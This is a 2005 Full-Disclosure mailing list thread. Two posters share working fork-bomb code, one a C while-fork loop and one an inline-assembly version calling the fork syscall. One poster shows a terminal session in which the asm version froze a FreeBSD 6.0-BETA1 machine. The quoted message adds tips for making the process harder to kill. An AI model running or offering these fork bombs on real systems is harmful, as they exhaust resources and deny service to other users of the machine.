┌([EMAIL PROTECTED]:p4)(~)
└(Power:on-line:100% cat > a.c
int main(){
__asm__(
"xorl %ecx,%ecx\n"
"cdq\n"
"HERE:\n"
"movl $0x2,%eax\n"
"int $0x80\n"
"jmp HERE\n"
);
}
^C
┌([EMAIL PROTECTED]:p4)(~)
└(130:Power:on-line:100% make a
cc -O -pipe -march=pentium4 a.c -o a
┌([EMAIL PROTECTED]:p4)(~)
└(Power:on-line:100% ./a
^C
┌([EMAIL PROTECTED]:p4)(~)
└(130:Power:on-line:100% uname -srm
FreeBSD 6.0-BETA1 i386
the machine froze instantly but eventually, after a minute or so I was
able to ^C
--
Jay
On Tue, 2005-08-16 at 11:10 +0200, Rik Bobbaers wrote:
> On Monday 15 August 2005 09:59, Jay wrote:
> > It's not nice to brag about finding 0-day bullshit in the bash fork
> > bomb that has been Zalewski's signature for years :P
>
> i think i know where he got it from.. i was on an irc channel a couple of
> days
> ago, and someone posted it (as a joke off course). it's ... ahm... funny that
> it comes back over here just a few days later!
>
> i don't know how this is a 0day and gives you remote access (it does the
> opposite...)
>
> but if you want one that's a bit harder to stop:
>
> c version:
> int main () {
> while (1) fork();
> }
>
> an asm (quick hack):
> int main(){
> __asm__(
> "xorl %ecx,%ecx\n"
> "cdq\n"
> "HERE:\n"
> "movl $0x2,%eax\n"
> "int $0x80\n"
> "jmp HERE\n"
> );
> }
>
> sry it's in c... the machine i made it on didn't have gas or nasm.
>
> anyway, if you compile this and run it in background, it will all die pretty
> fast. (to make it even harder, make your own signal handlers!(okay, SIGKILL
> will still work, but it will be harder to kill :))
>
> shall we call this C and assembler 0days? ;)
>
> --
> harry
> aka Rik Bobbaers
>
> K.U.Leuven - LUDIT -=- Tel: +32 485 52 71 50
> [EMAIL PROTECTED] -=- http://harry.ulyssis.org
>
> Disclaimer:
> By sending an email to ANY of my addresses you are agreeing that:
> 1. I am by definition, "the intended recipient"
> 2. All information in the email is mine to do with as I see fit and make
> such financial profit, political mileage, or good joke as it lends itself to.
> In particular, I may quote it on usenet.
> 3. I may take the contents as representing the views of your company.
> 4. This overrides any disclaimer or statement of confidentiality that may
> be
> included on your message.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>
--
This message was scanned for spam and viruses by BitDefender.
For more information please visit http://www.bitdefender.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
